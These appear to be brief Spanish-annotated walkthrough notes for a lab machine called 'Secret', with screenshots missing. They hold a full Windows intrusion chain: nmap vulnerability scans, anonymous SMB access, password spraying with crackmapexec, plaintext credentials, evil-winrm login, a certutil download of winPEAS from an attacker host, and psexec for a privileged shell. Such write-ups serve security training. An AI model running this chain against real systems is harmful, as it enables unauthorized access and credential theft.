nmap -A -p- -oA secret 172.31.1.4 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210713084402.png

nmap -sC -sV -O -p- -oA secret 172.31.1.4

nmap -sU -O -p- -oA secret-udp 172.31.1.4

smbclient -L \\172.31.1.4 -N 2>/dev/null | grep "Disk"

Pasted image 20210713084617.png

smbclient -H \\\\172.31.1.4\\Office_Share

Pasted image 20210713084806.png

   get Default_Passwords.txt

Pasted image 20210713085100.png

Vemos que en la parte anterior encontramos varios usuarios. Hacemos una lista

Pasted image 20210713085605.png

crackmapexec smb 172.31.1.4 -u username_secret_list.txt -p "SecretOrg!"

Vemos que jcakes es el usuario. jcakes:SecretOrg!

Pasted image 20210713095218.png

evil-winrm -i 172.31.1.4 -u jcakes -p SecretOrg!

python3 -m http.server 8888

certutil.exe -f -split -urlcache http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Pasted image 20210713095742.png

Pasted image 20210713100029.png

crackmapexec smb 172.31.1.4 -u username_secret_list.txt -p "vF4$x9#z:-eT~Fy"

Pasted image 20210713100711.png

python3 /opt/impacket/examples/psexec.py SECRET/bdover:'vF4$x9#z:-eT~Fy'@172.31.1.4

Pasted image 20210713100927.png

boxes

copyright©2022 Cu3rv0x all rights reserved